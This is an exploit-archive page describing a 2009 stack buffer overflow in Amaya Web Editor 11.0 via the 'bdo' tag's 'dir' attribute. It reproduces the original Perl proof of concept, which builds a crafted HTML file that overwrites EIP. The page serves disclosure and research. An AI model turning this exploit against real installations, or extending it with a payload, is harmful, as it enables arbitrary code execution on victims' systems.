Amaya Web Editor - exploit.company

vendor:

Amaya Web Editor

by:

Mountassif Moad (Stack)

9.3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Amaya Web Editor

Affected Version From: 11.0 and prior

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

Amaya Web Editor <= 11.0 Remote Buffer Overflow P0c

Amaya Web Editor version 11.0 and prior is vulnerable to a remote buffer overflow attack. By sending a specially crafted HTML file, an attacker can cause a buffer overflow in the application, resulting in arbitrary code execution. The vulnerability is caused due to a boundary error when handling the 'dir' attribute of the 'bdo' tag. This can be exploited to cause a stack-based buffer overflow by sending a specially crafted HTML file.

Mitigation:

Upgrade to the latest version of Amaya Web Editor

Source

Exploit-DB raw data:

#!/usr/bin/perl -w
# Amaya Web Editor <= 11.0 Remote Buffer Overflow P0c
 
# By Mountassif Moad (Stack)
# Here D : http://www.w3.org/Amaya/Distribution/amaya-WinXP-11.0.exe
# EAX 00000001
# ECX 0F866A64
# EDX 0083AA64 amaya.0083AA64
# EBX 00000000
# ESP 0012D080
# EBP 00000006
# ESI 0B425D00
# EDI 0085AD9C ASCII "src"
# EIP 44444444

print "===================================================================== \n";
print "Author : Stack            \n";
print "===================================================================== \n";
my $code ="<html>"."\n".
         '<bdo dir="'."\n";
my $bof = "\x41" x 160;
my $bof2 = "\x43" x 8;
my $bof3 = "\x44" x 4;
my $coding ='">'."\n".
             "Heap</bdo>"."\n".
            "</html>";
my $file="St_.html";
$exploit = $code.$bof.$bof2.$bof3.$coding;
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);
print "$file has been created \n";

# milw0rm.com [2009-01-29]